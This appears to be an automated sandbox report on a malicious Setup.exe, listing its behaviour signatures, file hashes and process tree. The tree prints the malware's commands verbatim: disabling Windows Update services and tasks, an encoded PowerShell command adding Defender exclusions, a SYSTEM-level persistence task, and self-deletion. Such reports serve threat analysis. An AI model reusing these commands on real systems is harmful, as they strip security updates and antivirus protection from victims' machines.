General
Target

Setup.exe

Filesize

4MB

Completed

05-05-2022 01:14

Task

behavioral1

Score
10/10
MD5

62ed80f638e9551e1e59b4ea9341bccd

SHA1

44196e8cb0f5774decf60e12215767f092c3c008

SHA256

c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

SHA256

56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config
Signatures 17

Filter: none

Defense Evasion
Discovery
Impact
Persistence
  • Modifies security service
    reg.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parametersreg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Securityreg.exe
  • Executes dropped EXE
    iexplor.exeiexplore.exe

    Reported IOCs

    pidprocess
    1732iexplor.exe
    284iexplore.exe
  • Possible privilege escalation attempt
    icacls.exetakeown.exe

    Tags

    Reported IOCs

    pidprocess
    1756icacls.exe
    1868takeown.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Loads dropped DLL
    Setup.exe

    Reported IOCs

    pidprocess
    1656Setup.exe
    1656Setup.exe
  • Modifies file permissions
    icacls.exetakeown.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    1756icacls.exe
    1868takeown.exe
  • Checks whether UAC is enabled
    iexplore.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAiexplore.exe
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    4ip-api.com
  • Drops file in System32 directory
    reg.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkreg.exe
  • Suspicious use of SetThreadContext
    iexplor.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1732 set thread context of 17121732iexplor.exeAppLaunch.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    544schtasks.exe
  • Modifies registry key
    reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    896reg.exe
    1436reg.exe
    1548reg.exe
    1736reg.exe
    2036reg.exe
    1620reg.exe
    1212reg.exe
    1476reg.exe
    2032reg.exe
  • Suspicious behavior: EnumeratesProcesses
    reg.exeiexplore.exe

    Reported IOCs

    pidprocess
    896reg.exe
    284iexplore.exe
  • Suspicious use of AdjustPrivilegeToken
    AppLaunch.exereg.exeiexplore.exetakeown.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1712AppLaunch.exe
    Token: SeDebugPrivilege896reg.exe
    Token: SeDebugPrivilege284iexplore.exe
    Token: SeTakeOwnershipPrivilege1868takeown.exe
  • Suspicious use of WriteProcessMemory
    Setup.exeiexplor.exeiexplore.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1656 wrote to memory of 17321656Setup.exeiexplor.exe
    PID 1656 wrote to memory of 17321656Setup.exeiexplor.exe
    PID 1656 wrote to memory of 17321656Setup.exeiexplor.exe
    PID 1656 wrote to memory of 17321656Setup.exeiexplor.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1732 wrote to memory of 17121732iexplor.exeAppLaunch.exe
    PID 1656 wrote to memory of 2841656Setup.exeiexplore.exe
    PID 1656 wrote to memory of 2841656Setup.exeiexplore.exe
    PID 1656 wrote to memory of 2841656Setup.exeiexplore.exe
    PID 1656 wrote to memory of 2841656Setup.exeiexplore.exe
    PID 284 wrote to memory of 768284iexplore.execmd.exe
    PID 284 wrote to memory of 768284iexplore.execmd.exe
    PID 284 wrote to memory of 768284iexplore.execmd.exe
    PID 768 wrote to memory of 896768cmd.exepowershell.exe
    PID 768 wrote to memory of 896768cmd.exepowershell.exe
    PID 768 wrote to memory of 896768cmd.exepowershell.exe
    PID 284 wrote to memory of 1980284iexplore.execmd.exe
    PID 284 wrote to memory of 1980284iexplore.execmd.exe
    PID 284 wrote to memory of 1980284iexplore.execmd.exe
    PID 1980 wrote to memory of 16601980cmd.exeschtasks.exe
    PID 1980 wrote to memory of 16601980cmd.exeschtasks.exe
    PID 1980 wrote to memory of 16601980cmd.exeschtasks.exe
    PID 1980 wrote to memory of 6161980cmd.exesc.exe
    PID 1980 wrote to memory of 6161980cmd.exesc.exe
    PID 1980 wrote to memory of 6161980cmd.exesc.exe
    PID 1980 wrote to memory of 12001980cmd.exesc.exe
    PID 1980 wrote to memory of 12001980cmd.exesc.exe
    PID 1980 wrote to memory of 12001980cmd.exesc.exe
    PID 1980 wrote to memory of 8841980cmd.exesc.exe
    PID 1980 wrote to memory of 8841980cmd.exesc.exe
    PID 1980 wrote to memory of 8841980cmd.exesc.exe
    PID 1980 wrote to memory of 9521980cmd.exesc.exe
    PID 1980 wrote to memory of 9521980cmd.exesc.exe
    PID 1980 wrote to memory of 9521980cmd.exesc.exe
    PID 1980 wrote to memory of 16201980cmd.exereg.exe
    PID 1980 wrote to memory of 16201980cmd.exereg.exe
    PID 1980 wrote to memory of 16201980cmd.exereg.exe
    PID 1980 wrote to memory of 12121980cmd.exereg.exe
    PID 1980 wrote to memory of 12121980cmd.exereg.exe
    PID 1980 wrote to memory of 12121980cmd.exereg.exe
    PID 1980 wrote to memory of 20321980cmd.exereg.exe
    PID 1980 wrote to memory of 20321980cmd.exereg.exe
    PID 1980 wrote to memory of 20321980cmd.exereg.exe
    PID 1980 wrote to memory of 20361980cmd.exereg.exe
    PID 1980 wrote to memory of 20361980cmd.exereg.exe
    PID 1980 wrote to memory of 20361980cmd.exereg.exe
    PID 1980 wrote to memory of 14761980cmd.exereg.exe
    PID 1980 wrote to memory of 14761980cmd.exereg.exe
    PID 1980 wrote to memory of 14761980cmd.exereg.exe
    PID 1980 wrote to memory of 18681980cmd.exetakeown.exe
    PID 1980 wrote to memory of 18681980cmd.exetakeown.exe
    PID 1980 wrote to memory of 18681980cmd.exetakeown.exe
    PID 1980 wrote to memory of 17561980cmd.exeicacls.exe
    PID 1980 wrote to memory of 17561980cmd.exeicacls.exe
    PID 1980 wrote to memory of 17561980cmd.exeicacls.exe
    PID 284 wrote to memory of 1296284iexplore.execmd.exe
    PID 284 wrote to memory of 1296284iexplore.execmd.exe
Processes 37
  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    Loads dropped DLL
    Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        Suspicious use of AdjustPrivilegeToken
        PID:1712
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        Suspicious use of WriteProcessMemory
        PID:768
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1756
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:1868
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1476
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:2036
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:2032
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:1212
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:1620
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:952
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:884
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1200
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:616
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:1660
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Drops file in System32 directory
          Modifies registry key
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:896
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1604
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:1012
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:1660
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:1496
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:660
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:1772
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:1572
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1436
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:1736
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        PID:1296
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
        PID:828
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "iexplore"
          PID:1132
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
        PID:1708
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    PID:896
  • C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    Creates scheduled task(s)
    PID:544
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {47D75480-1254-4120-8999-F0B8E9C07A5F} S-1-5-18:NT AUTHORITY\System:Service:
    PID:1924
  • C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    PID:1996
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Execution
          Exfiltration
            Impact
            Initial Access
              Lateral Movement
                Privilege Escalation
                  Replay Monitor
                  00:00 00:00
                  Downloads
                  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe

                    MD5

                    0321c416de650006033c0b39ee7415dc

                    SHA1

                    ef1618ec72f9c2b0f9eb571e948eda1849622ee0

                    SHA256

                    c5c3bdbbbe983764746db3cf979dd4e393bcd731bafba0e65862adebf8791401

                    SHA512

                    ce4ca51383945f3122d367692bc5544312a43709eae5fc799c51cfbaf6a89887f9e779fa029d3cc853ea0c4eb0f3117db05e4e6b74c5a6faab6fce15b6b3d290

                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe

                    MD5

                    e55dca7417400b2849053d99c2e8f90f

                    SHA1

                    c8e6684b5ae693a77921f17a0b2034c967e20fd6

                    SHA256

                    7d09be461a15955204d8b92c0f680cd944fba569e99ad53ee627a0cff6b902eb

                    SHA512

                    e3b54578695d9b49b9d9c247b31d959c2053c35974dbf34309b47bd827f7e96780f5c2d3b899622ea2a9feda0e2fb706929c6867e6ea1fbdc582cf5e0dd85c0f

                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe

                    MD5

                    e55dca7417400b2849053d99c2e8f90f

                    SHA1

                    c8e6684b5ae693a77921f17a0b2034c967e20fd6

                    SHA256

                    7d09be461a15955204d8b92c0f680cd944fba569e99ad53ee627a0cff6b902eb

                    SHA512

                    e3b54578695d9b49b9d9c247b31d959c2053c35974dbf34309b47bd827f7e96780f5c2d3b899622ea2a9feda0e2fb706929c6867e6ea1fbdc582cf5e0dd85c0f

                  • \Users\Admin\AppData\Local\Temp\iexplor.exe

                    MD5

                    ef702e32a3f1b8c108b9b3b114b80b85

                    SHA1

                    c7c8d835bb9b5f1e39160ed6ffaea25ec577a018

                    SHA256

                    12414449354293611c445a86d7b4be3c4c43117a6f8eb0b1d3b8de368c97b4ca

                    SHA512

                    56ed334974d92f5021190d28b9911e6229c1c250bb5663f11593c82c92fb8a6cb36c027deed8dc712702b1ff8fb12774f587aaa3e8bc2c6a0d1d2a199c9cbe0f

                  • \Users\Admin\AppData\Local\Temp\iexplore.exe

                    MD5

                    b962736fa488af772c9a90465a76d1aa

                    SHA1

                    d4b25526b9f197f0b93f26e6b1a08bac9467a9e6

                    SHA256

                    3ecc278b28aa51b3dda9efa7acf1f0e2ef37c87b23db4452e3a7db44324503f7

                    SHA512

                    380b79221234ee2b63867789d342c34e59b39303235545ee81d577ebb408fc59464cc0e64a884137bad169fb6fd392d3d12bb8f82303f469aaab5f5d220ad495

                  • memory/284-73-0x000000013FF40000-0x000000014015C000-memory.dmp

                  • memory/284-70-0x0000000000000000-mapping.dmp

                  • memory/284-75-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

                  • memory/284-74-0x000000001CDF0000-0x000000001CFEA000-memory.dmp

                  • memory/544-96-0x0000000000000000-mapping.dmp

                  • memory/616-84-0x0000000000000000-mapping.dmp

                  • memory/660-103-0x0000000000000000-mapping.dmp

                  • memory/768-76-0x0000000000000000-mapping.dmp

                  • memory/828-108-0x0000000000000000-mapping.dmp

                  • memory/884-86-0x0000000000000000-mapping.dmp

                  • memory/896-81-0x000000000274B000-0x000000000276A000-memory.dmp

                  • memory/896-77-0x0000000000000000-mapping.dmp

                  • memory/896-99-0x0000000000000000-mapping.dmp

                  • memory/896-79-0x000007FEEC440000-0x000007FEECF9D000-memory.dmp

                  • memory/896-80-0x0000000002744000-0x0000000002747000-memory.dmp

                  • memory/952-87-0x0000000000000000-mapping.dmp

                  • memory/1012-106-0x0000000000000000-mapping.dmp

                  • memory/1132-111-0x0000000000000000-mapping.dmp

                  • memory/1200-85-0x0000000000000000-mapping.dmp

                  • memory/1212-89-0x0000000000000000-mapping.dmp

                  • memory/1296-95-0x0000000000000000-mapping.dmp

                  • memory/1436-100-0x0000000000000000-mapping.dmp

                  • memory/1476-92-0x0000000000000000-mapping.dmp

                  • memory/1496-104-0x0000000000000000-mapping.dmp

                  • memory/1548-98-0x0000000000000000-mapping.dmp

                  • memory/1572-101-0x0000000000000000-mapping.dmp

                  • memory/1604-107-0x0000000000000000-mapping.dmp

                  • memory/1620-88-0x0000000000000000-mapping.dmp

                  • memory/1656-54-0x00000000750C1000-0x00000000750C3000-memory.dmp

                  • memory/1660-105-0x0000000000000000-mapping.dmp

                  • memory/1660-83-0x0000000000000000-mapping.dmp

                  • memory/1708-109-0x0000000000000000-mapping.dmp

                  • memory/1712-67-0x0000000000400000-0x0000000000422000-memory.dmp

                  • memory/1712-65-0x000000000041CE12-mapping.dmp

                  • memory/1712-60-0x0000000000400000-0x0000000000422000-memory.dmp

                  • memory/1712-66-0x0000000000400000-0x0000000000422000-memory.dmp

                  • memory/1712-58-0x0000000000400000-0x0000000000422000-memory.dmp

                  • memory/1732-56-0x0000000000000000-mapping.dmp

                  • memory/1736-97-0x0000000000000000-mapping.dmp

                  • memory/1756-94-0x0000000000000000-mapping.dmp

                  • memory/1772-102-0x0000000000000000-mapping.dmp

                  • memory/1868-93-0x0000000000000000-mapping.dmp

                  • memory/1980-82-0x0000000000000000-mapping.dmp

                  • memory/1996-110-0x0000000000000000-mapping.dmp

                  • memory/2032-90-0x0000000000000000-mapping.dmp

                  • memory/2036-91-0x0000000000000000-mapping.dmp